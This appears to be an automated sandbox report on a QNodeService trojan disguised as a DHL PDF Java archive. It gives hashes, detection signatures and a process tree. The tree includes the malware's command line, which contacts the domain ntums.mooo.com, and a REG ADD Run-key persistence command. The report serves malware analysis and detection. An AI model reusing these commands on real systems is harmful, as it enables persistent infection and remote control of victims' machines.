Analysis
-
max time kernel
46s -
max time network
139s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
27-11-2020 10:41
Static task
static1
Behavioral task
behavioral1
Sample
DHL_Nov 2020 at 1.85_8BZ290_PDF.jar
Resource
win7v20201028
Behavioral task
behavioral2
Sample
DHL_Nov 2020 at 1.85_8BZ290_PDF.jar
Resource
win10v20201028
General
-
Target
DHL_Nov 2020 at 1.85_8BZ290_PDF.jar
-
Size
71KB
-
MD5
f204d9f0175eb6a66a0e312d63477680
-
SHA1
e161a465e339be0ec43ba30ee7b0c25a9b40dc0e
-
SHA256
d529003a6e1708637cc07277bfbef218db0dcaec7eed84b28567910f439297ee
-
SHA512
7d0c8c20539affd05bc5ee7de1cdc4cb65e2127b7972418c686677d7b4d12e34803446f73bce0406fdeeea6ab72c9fabee5aeb81985bce1502aabaa9d531c227
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
Executes dropped EXE 3 IoCs
pid Process 1000 node.exe 640 node.exe 2828 node.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\a7711235-3d47-45fc-91ec-f845beae6ac6 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" reg.exe -
JavaScript code in executable 3 IoCs
resource yara_rule behavioral2/files/0x000100000001ab7b-176.dat js behavioral2/files/0x000100000001ab7b-181.dat js behavioral2/files/0x000100000001ab7b-185.dat js -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 21 wtfismyip.com 22 wtfismyip.com -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 1000 node.exe 1000 node.exe 1000 node.exe 1000 node.exe 640 node.exe 640 node.exe 640 node.exe 640 node.exe 2828 node.exe 2828 node.exe 2828 node.exe 2828 node.exe 2828 node.exe 2828 node.exe 2828 node.exe 2828 node.exe 2828 node.exe 2828 node.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 944 wrote to memory of 3212 944 java.exe 77 PID 944 wrote to memory of 3212 944 java.exe 77 PID 3212 wrote to memory of 1000 3212 javaw.exe 81 PID 3212 wrote to memory of 1000 3212 javaw.exe 81 PID 1000 wrote to memory of 640 1000 node.exe 83 PID 1000 wrote to memory of 640 1000 node.exe 83 PID 640 wrote to memory of 2828 640 node.exe 84 PID 640 wrote to memory of 2828 640 node.exe 84 PID 2828 wrote to memory of 3596 2828 node.exe 86 PID 2828 wrote to memory of 3596 2828 node.exe 86 PID 3596 wrote to memory of 1856 3596 cmd.exe 87 PID 3596 wrote to memory of 1856 3596 cmd.exe 87
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\DHL_Nov 2020 at 1.85_8BZ290_PDF.jar"1⤵
- Suspicious use of WriteProcessMemory
PID:944 -
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\2046ecee.tmp2⤵
- Suspicious use of WriteProcessMemory
PID:3212 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain ntums.mooo.com3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1000 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_vd0F0V\boot.js --hub-domain ntums.mooo.com4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:640 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_vd0F0V\boot.js --hub-domain ntums.mooo.com5⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2828 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "a7711235-3d47-45fc-91ec-f845beae6ac6" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""6⤵
- Suspicious use of WriteProcessMemory
PID:3596 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "a7711235-3d47-45fc-91ec-f845beae6ac6" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""7⤵
- Adds Run key to start application
PID:1856
-
-
-
-
-
-